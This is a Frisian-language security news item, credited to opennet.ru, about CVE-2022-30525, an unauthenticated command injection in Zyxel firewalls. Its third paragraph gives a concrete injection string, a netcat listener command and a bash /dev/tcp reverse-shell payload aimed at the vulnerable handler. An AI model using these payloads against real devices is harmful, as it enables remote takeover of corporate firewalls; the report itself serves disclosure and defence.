Kwetsberens yn Zyxel-firewalls dy't koade útfiere sûnder autentikaasje

In krityske kwetsberens (CVE-2022-30525) is identifisearre yn Zyxel-apparaten fan 'e ATP-, VPN- en USG FLEX-searje, ûntworpen om de wurking fan firewalls, IDS en VPN yn bedriuwen te organisearjen, wêrtroch in eksterne oanfaller koade kin útfiere op 'e apparaat sûnder brûkersrjochten sûnder autentikaasje. Om in oanfal út te fieren, moat in oanfaller fersiken nei it apparaat kinne stjoere mei it HTTP/HTTPS-protokol. Zyxel hat de kwetsberens reparearre yn 'e ZLD 5.30-firmware-update. Neffens de Shodan-tsjinst binne d'r op it stuit 16213 potensjeel kwetsbere apparaten op it wrâldwide netwurk dy't oanfragen akseptearje fia HTTP / HTTPS.

Operaasje wurdt útfierd troch it ferstjoeren fan spesjaal ûntwurpen kommando's nei de web handler /ztp/cgi-bin/handler, tagonklik sûnder autentikaasje. It probleem wurdt feroarsake troch it gebrek oan goede skjinmeitsjen fan fersykparameters by it útfieren fan kommando's op it systeem mei de os.system-oprop dy't brûkt wurdt yn 'e lib_wan_settings.py-bibleteek en útfierd by it ferwurkjen fan de setWanPortSt-operaasje.

Bygelyks, in oanfaller koe de tekenrige trochjaan "; ping 192.168.1.210;" wat sil liede ta de útfiering fan it kommando "ping 192.168.1.210" op it systeem. Om tagong te krijen ta de kommando-shell, kinne jo "nc -lvnp 1270" op jo systeem útfiere, en dan in omkearde ferbining begjinne troch in fersyk nei it apparaat te stjoeren mei de '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Boarne: opennet.ru

Add a comment